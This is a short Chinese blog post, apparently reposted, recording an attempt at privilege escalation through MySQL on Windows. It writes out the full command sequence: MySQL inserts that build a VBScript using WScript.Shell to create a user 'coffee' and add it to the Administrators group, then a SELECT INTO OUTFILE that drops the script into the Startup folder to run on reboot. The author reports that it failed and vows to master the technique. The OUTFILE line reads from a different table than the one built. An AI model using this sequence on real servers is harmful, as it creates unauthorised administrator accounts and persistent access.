记mysql下提权不成功的一次学习

文章来源:

http://www.jb51.net/hack/32280.html

命令操作如下:

mysql> create table a (cmd text);

Query OK, 0 rows affected


mysql> insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );

Query OK, 1 row affected


mysql> insert into a values ("a=wshshell.run (""cmd.exe /c net user coffee y2k10516 /add"",0) " );

Query OK, 1 row affected

mysql> insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators y2k10516 /add"",0) " );

Query OK, 1 row affected


1.使用命令后效果

mysql> select * from a ;

+------------------------------------------------------------------------------+

| cmd                                                                          |

+------------------------------------------------------------------------------+

| set wshshell=createobject ("wscript.shell" )                                 |

| a=wshshell.run ("cmd.exe /c net user coffee y2k10516 /add",0)                |

| b=wshshell.run ("cmd.exe /c net localgroup Administrators y2k10516 /add",0)  |

+------------------------------------------------------------------------------+

3 rows in set

打入启动项:

1. select * from libc into outfile "c:\docume~1\alluse~1\「开始」菜单\程序\启动\libc.vbs";


等系统重启就有新用户了/


我没有实现提权,虽然是用的root用户,但是可能数据库有设置,没法执行写文件权限。有的root 因为是默认的空密码,所以没法远程执行有的sql命令;


提权是一个技术活,我早晚会搞定这个技术的!




本文出自 “丑小鸭的天空” 博客,谢绝转载!

你可能感兴趣的:(mysql,insert,文章,create,values)